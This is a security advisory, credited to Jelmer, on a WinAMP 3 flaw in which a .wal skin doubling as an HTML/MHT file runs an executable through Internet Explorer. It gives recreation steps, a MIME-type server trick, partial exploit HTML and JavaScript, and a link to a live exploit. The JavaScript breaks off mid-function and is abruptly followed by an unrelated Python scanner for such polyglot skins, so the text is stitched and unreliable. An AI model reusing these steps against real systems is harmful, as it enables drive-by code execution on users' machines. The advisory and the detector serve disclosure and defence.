The new WinAMP 3 fails to address a serious arbitrary code execution vulnerability when the program is combined with Internet Explorer. The vulnerability allows a remote attacker to cause the program to execute arbitrary code automatically without the need for user intervention.
Credit:
The information has been provided by Jelmer.
Vulnerable systems:
* WinAMP 3
* WinAMP 2 (Though this vulnerability advisory was written for WinAMP 3, WinAMP 2 has a similar problem)
WinAMP 3 uses a new skinning system based on the .wal extension. This skin type is opened automatically in MSIE (it does not prompt for download), and the skin is stored in a known location on the user's hard disk, namely:
C:\Program Files\Winamp3\Skins
(This is the default location given by the program)
Exploit:
A working exploit code is available at http://kuperus.xs4all.nl/winamp3.htm (NOTE, this is a working exploit code, going to the link will cause WinAMP to run arbitrary code).
Note that this version of the exploit code does not use any MSIE hole to invoke the executable, so it will continue to work even after Microsoft patches its browser.
Recreation steps:
1) Create a directory c:\exploit
2) Place an EXE file in it, let us call it payload.exe, then create a file called exploit.htm and give it the following contents:
3) Open the file in Internet Explorer, choose File > Save As, and save it as exploit.mht
4) Open it in Notepad and add the following line to the top:
<html style="display:none;">
It should look like this :
<html style="display:none;">
From: <Saved by Microsoft Internet Explorer 5>
Subject:
Date: Mon, 5 Aug 2002 18:30:03 +0200
MIME-Version: 1.0
Then look for the body section of this HTML document (it looks a little mangled), delete everything between the body tags and place an object tag in its place, so it looks like this:
(To prevent execution, the O was replaced with a 0)
This code will later be used to invoke our executable. What we have done is we have slightly altered the MHT file so that it can be viewed both as HTML and as MHT file. Files starting with an <html> tag are always seen as HTML files in Internet Explorer.
5) Now we want to place this on the user's hard disk. We know WAL files are opened automatically by WinAMP 3 and placed in a known location, so we will rename our exploit.mht file to .wal. Unfortunately, Internet Explorer disrespects MIME types: because we added an <html> tag to the MHT file, it tries to open it as an HTML file. The only way Jelmer found around this is to set the MIME type to a value MSIE does not know; Jelmer chose x-foo/x-bar. If you are using Apache, you can add the following to your mime.types file:
x-foo/x-bar wal
This means that the web server will send this MIME type along with every requested file ending in .wal. When we now request this file, it will be opened by WinAMP 3 and an error message will follow shortly. However, by that time it is already too late: our exploit.wal file has been placed in
C:\Program Files\WinAMP3\Skins\exploit.wal
Now all that remains is bringing it together by making the following sequence of events occur:
1. Download our exploit.wal
2. Wait a few seconds for it to finish downloading then call exploit.wal as HTML file (the file also doubles as MHT file and the object tag included in the HTML portion points to itself as the codebase)
Here is the code for this:
<html>
<body>
Waiting for 5 seconds..
<!-- download our renamed mht file and place it on the users disk -->
<!frame src="amp.wal" style="display:none"></iframe>
<scr!pt language="javascript">
//wait for 5 seconds
setTimeout("ExecuteFile()",5000);
function ExecuteFile() {
// open the saved wal file as html file
// oddly when called from disk it didn't open it as html file so we need to force this behaviour by using a modeless dialog
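As an added, defender-side example (not part of Jelmer's advisory or of WinAMP), the following Python flags a file that landed in the Skins folder by the markers this advisory describes: an <html> tag at the very start, the MHT mail headers, and an embedded object/script/iframe tag. It assumes a genuine .wal skin is a ZIP archive (the advisory does not state the format) and uses constructed sample bytes.

```python
import os
import re

# Markers of the HTML/MHT polyglot described in the advisory.
HTML_LEAD = re.compile(rb"^\s*(?:<!--.*?-->\s*)*<html\b", re.IGNORECASE | re.DOTALL)
MHT_HEADERS = (b"From: <Saved by Microsoft Internet Explorer",
               b"MIME-Version:", b"Content-Type: multipart/related")
ACTIVE_TAGS = re.compile(rb"<\s*(object|script|iframe)\b", re.IGNORECASE)
ZIP_MAGIC = b"PK\x03\x04"  # assumption: real .wal skins are ZIP archives


def inspect_skin(data: bytes) -> dict:
    """Return the indicators found in a candidate .wal file and an overall verdict.

    A skin that starts with an <html> tag or carries MHT headers is a document
    that IE will parse, not a skin; active markup in a non-ZIP file is also flagged.
    """
    head = data[:4096]
    findings = {
        "html_lead": bool(HTML_LEAD.search(head)),
        "mht_headers": any(h in head for h in MHT_HEADERS),
        "active_content": bool(ACTIVE_TAGS.search(data)),
        "zip_magic": head.startswith(ZIP_MAGIC),
    }
    findings["suspicious"] = (findings["html_lead"] or findings["mht_headers"]
                              or (not findings["zip_magic"] and findings["active_content"]))
    return findings


def scan_skins_dir(skins_dir: str) -> list:
    """Return the names of .wal files under skins_dir that look like polyglots."""
    flagged = []
    for name in sorted(os.listdir(skins_dir)):
        if not name.lower().endswith(".wal"):
            continue
        with open(os.path.join(skins_dir, name), "rb") as fh:
            if inspect_skin(fh.read())["suspicious"]:
                flagged.append(name)
    return flagged


# Constructed samples: a polyglot shaped like the advisory's file, and a ZIP-like skin.
POLYGLOT = (b'<html style="display:none;">\r\n'
            b'From: <Saved by Microsoft Internet Explorer 5>\r\nSubject: \r\n'
            b'MIME-Version: 1.0\r\n\r\n<body><object codebase="PLACEHOLDER"></object></body>')
BENIGN_SKIN = ZIP_MAGIC + b"\x00" * 26 + b"skin.xml"

if __name__ == "__main__":
    print("polyglot:", inspect_skin(POLYGLOT))
    print("skin:", inspect_skin(BENIGN_SKIN))
```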